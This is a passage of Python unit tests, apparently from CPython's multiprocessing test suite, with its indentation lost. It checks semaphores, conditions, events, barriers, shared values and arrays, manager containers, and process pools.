self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=10))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(10))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 10)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
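# A _DummyList acts as the shared counter described above, e.g.
# counter = _DummyList()
# counter.append(True) # increments the shared length buffer
# len(counter) # -> 1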
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
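# Helper functions and classes used by the Pool tests below.  They live at
# module level so they can be pickled and sent to worker processes;
# CountedObject tracks live instances and SayWhenError is raised part-way
# through an iterable to exercise error handling in map()/imap().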
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
        tuples = list(zip(range(10), range(9, -1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
        tuples = list(zip(range(100), range(99, -1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
        tuples = list(zip(range(100), range(99, -1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(1000)))
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=53)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
        # SayWhenError seen at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
